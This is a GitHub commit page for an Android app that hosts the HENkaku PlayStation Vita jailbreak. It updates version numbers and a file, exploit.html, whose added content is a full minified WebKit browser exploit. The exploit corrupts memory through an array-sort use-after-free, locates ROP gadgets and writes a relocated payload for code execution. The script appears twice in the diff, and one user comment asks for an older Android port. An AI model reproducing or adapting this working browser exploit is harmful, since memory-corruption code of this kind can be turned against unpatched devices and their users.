This repository has been archived by the owner on Mar 14, 2019. It is now read-only.

Updated HENkaku to Release 5.
Updated VitaShell to 0.91.
codestation committed Sep 6, 2016
1 parent 5134e30 commit 887de65
Showing 4 changed files with 3 additions and 3 deletions.
4 changes: 2 additions & 2 deletions app/build.gradle
Expand Up @@ -8,8 +8,8 @@ android {
applicationId "com.codestation.henkakuserver"
minSdkVersion 15
targetSdkVersion 24
versionCode 5
versionName "1.4"
versionCode 6
versionName "1.5"
}
buildTypes {
release {
2 changes: 1 addition & 1 deletion app/src/main/assets/exploit.html
@@ -1,2 +1,2 @@
<script src='payload.js'></script><script>var r,a,e,t,n,l,o,i,f,v,s,c;var u,y,w,p,d,g,h,b,k;var A,U;var m=64+payload[16/4];m/=4;var F=null;function D(r,a){if(!F)F=new DataView(new ArrayBuffer(16));F.setUint32(0,a);F.setUint32(4,r);return F.getFloat64(0)}function E(r){if(!F)F=new DataView(new ArrayBuffer(16));F.setFloat64(0,r);return{low:F.getUint32(4),hi:F.getUint32(0)}}var x=0;var L=0;var B=new Uint32Array(1024);function S(r){x=K[r/4];L=K[r/4+1];return((x&4095|(x&983040)>>4)&65535|((L&4095|(L&983040)>>4)&65535)<<16)>>>0}r=16384;a=new Array(r);e=new Array(r);t=4932;n=1717920867;l=1431655765;for(var V=0;V<e.length;++V){e[V]=new Uint32Array(t/4);var H=document.createElement("textarea");H.rows=n;a[V]=H}for(var V=0;V<1024;++V){var H=document.createElement("textarea");H.rows=n;a.push(H)}var N=12288;var W=Array.prototype.constructor.apply(null,new Array(N));var j=2048;var q=new Array(j);var z={};var C=new Array(256);z.toString=function(){W.push(12345);for(var r=0;r<C.length;++r){var a=Array.prototype.constructor.apply(null,q);a[0]=0;a[1]=1;a[2]=2;C[r]=a}return""};W[0]=z;var G=D(2147483648,2147483648);for(var V=1;V<8192;++V)W[V]=G;W.sort();contents="";cur=0;z.toString=function(){};var I=null;for(var V=0;V<C.length;++V){if(C[V].length!=j){I=C[V];break}}if(I==null){alert("restart the browser");while(1){}}var J=536870912-69632;for(;;J--){if(I[J]!=0){F.setFloat64(0,I[J]);if(F.getUint32(0)==t/4){F.setUint32(0,4026531808);I[J]=F.getFloat64(0);F.setFloat64(0,I[J-2]);v=F.getUint32(4);F.setUint32(4,0);F.setUint32(0,2147483648);I[J-2]=F.getFloat64(0);break}}}o=null;for(var V=0;V<e.length;++V){if(e[V].byteLength!=t){o=e[V];break}}if(!o){alert("failed");while(1){}}var K=o;var M=v;f=v;for(var O=f/4;O<f/4+16384;++O){if(K[O]==n){K[O]=l;s=O*4;i=true;break}}if(!i){alert("Did not find Element signature");while(1){}}var P=false;var Q;for(var V=0;V<a.length;++V){if(a[V].rows==l){Q=a[V];P=true;break}}if(!P){alert("Did not find corrupted textarea");while(1){}}var R=s-112;var 
T=K[R/4];u=T-11253340;y=S(u+8779012)-64073;w=S(u+8778852)-36913;p=S(u+8770276)-142693;d=S(p+2910348)-2533;g=S(d+15300)-56365;h=S(u+8778772)-9197;b=S(g+101364)-3417;k=S(b+39608)-18893;for(var V=0;V<64;V++)K[M/4+V]=K[T/4+V];K[R/4]=M;for(var V=0;V<48;++V)B[V]=K[R/4+V];K[M/4+78]=y+82032|1;Q.scrollLeft=0;c=(K[R/4+8]^(K[R/4+9]^u+3242281)>>>0)>>>0;c-=981016;for(var V=0;V<48;++V)K[R/4+V]=B[V];A=c+64;U=c+65536;O=c/4;for(var V=0;V<payload.length;++V,++O){if(V==m)O=U/4;switch(relocs[V]){case 0:K[O]=payload[V];break;case 1:K[O]=payload[V]+A;break;case 2:K[O]=payload[V]+u;break;case 3:K[O]=payload[V]+w;break;case 4:K[O]=payload[V]+y;break;case 5:K[O]=payload[V]+g;break;case 6:K[O]=payload[V]+h;break;case 7:K[O]=payload[V]+k;break;default:alert("wtf?");alert(V+" "+relocs[V])}}K[M/4+78]=u+21704;var X=M+256;K[X/4+5]=U;K[X/4+6]=u+787594|1;alert("Welcome to HENkaku!");Q.scrollLeft=X;alert("that's it");
<noscript>Go to browser settings and check "Enable JavaScript", then reload this page.</noscript><script src='payload.js'></script><script>var r,a,e,t,n,l,o,i,f,v,s,c;var u,y,w,p,d,g,h,b,k;var A,U;var m=64+payload[16/4];m/=4;var F=null;function D(r,a){if(!F)F=new DataView(new ArrayBuffer(16));F.setUint32(0,a);F.setUint32(4,r);return F.getFloat64(0)}function E(r){if(!F)F=new DataView(new ArrayBuffer(16));F.setFloat64(0,r);return{low:F.getUint32(4),hi:F.getUint32(0)}}var x=0;var L=0;var B=new Uint32Array(1024);function S(r){x=K[r/4];L=K[r/4+1];return((x&4095|(x&983040)>>4)&65535|((L&4095|(L&983040)>>4)&65535)<<16)>>>0}r=16384;a=new Array(r);e=new Array(r);t=4932;n=1717920867;l=1431655765;for(var V=0;V<e.length;++V){e[V]=new Uint32Array(t/4);var H=document.createElement("textarea");H.rows=n;a[V]=H}for(var V=0;V<1024;++V){var H=document.createElement("textarea");H.rows=n;a.push(H)}var N=12288;var W=Array.prototype.constructor.apply(null,new Array(N));var j=2048;var q=new Array(j);var z={};var C=new Array(256);z.toString=function(){W.push(12345);for(var r=0;r<C.length;++r){var a=Array.prototype.constructor.apply(null,q);a[0]=0;a[1]=1;a[2]=2;C[r]=a}return""};W[0]=z;var G=D(2147483648,2147483648);for(var V=1;V<8192;++V)W[V]=G;W.sort();contents="";cur=0;z.toString=function(){};var I=null;for(var V=0;V<C.length;++V){if(C[V].length!=j){I=C[V];break}}if(I==null){alert("restart the browser");while(1){}}var J=536870912-69632;for(;;J--){if(I[J]!=0){F.setFloat64(0,I[J]);if(F.getUint32(0)==t/4){F.setUint32(0,4026531808);I[J]=F.getFloat64(0);F.setFloat64(0,I[J-2]);v=F.getUint32(4);F.setUint32(4,0);F.setUint32(0,2147483648);I[J-2]=F.getFloat64(0);break}}}o=null;for(var V=0;V<e.length;++V){if(e[V].byteLength!=t){o=e[V];break}}if(!o){alert("failed");while(1){}}var K=o;var M=v;f=v;for(var O=f/4;O<f/4+16384;++O){if(K[O]==n){K[O]=l;s=O*4;i=true;break}}if(!i){alert("Did not find Element signature");while(1){}}var P=false;var Q;for(var 
V=0;V<a.length;++V){if(a[V].rows==l){Q=a[V];P=true;break}}if(!P){alert("Did not find corrupted textarea");while(1){}}var R=s-112;var T=K[R/4];u=T-11253340;y=S(u+8779012)-64073;w=S(u+8778852)-36913;p=S(u+8770276)-142693;d=S(p+2910348)-2533;g=S(d+15300)-56365;h=S(u+8778772)-9197;b=S(g+101364)-3417;k=S(b+39608)-18893;for(var V=0;V<64;V++)K[M/4+V]=K[T/4+V];K[R/4]=M;for(var V=0;V<48;++V)B[V]=K[R/4+V];K[M/4+78]=y+82032|1;Q.scrollLeft=0;c=(K[R/4+8]^(K[R/4+9]^u+3242281)>>>0)>>>0;c-=981016;for(var V=0;V<48;++V)K[R/4+V]=B[V];A=c+64;U=c+65536;O=c/4;for(var V=0;V<payload.length;++V,++O){if(V==m)O=U/4;switch(relocs[V]){case 0:K[O]=payload[V];break;case 1:K[O]=payload[V]+A;break;case 2:K[O]=payload[V]+u;break;case 3:K[O]=payload[V]+w;break;case 4:K[O]=payload[V]+y;break;case 5:K[O]=payload[V]+g;break;case 6:K[O]=payload[V]+h;break;case 7:K[O]=payload[V]+k;break;default:alert("wtf?");alert(V+" "+relocs[V])}}K[M/4+78]=u+21704;var X=M+256;K[X/4+5]=U;K[X/4+6]=u+787594|1;alert("Welcome to HENkaku!");Q.scrollLeft=X;alert("that's it");
</script>
Binary file modified app/src/main/assets/exploit.rop.bin
Binary file not shown.
Binary file modified app/src/main/assets/pkg/eboot.bin
Binary file not shown.

1 comment on commit 887de65

@julioapc16

Friend, could you make a version of HENkaku-Android for Android 2.3.6?
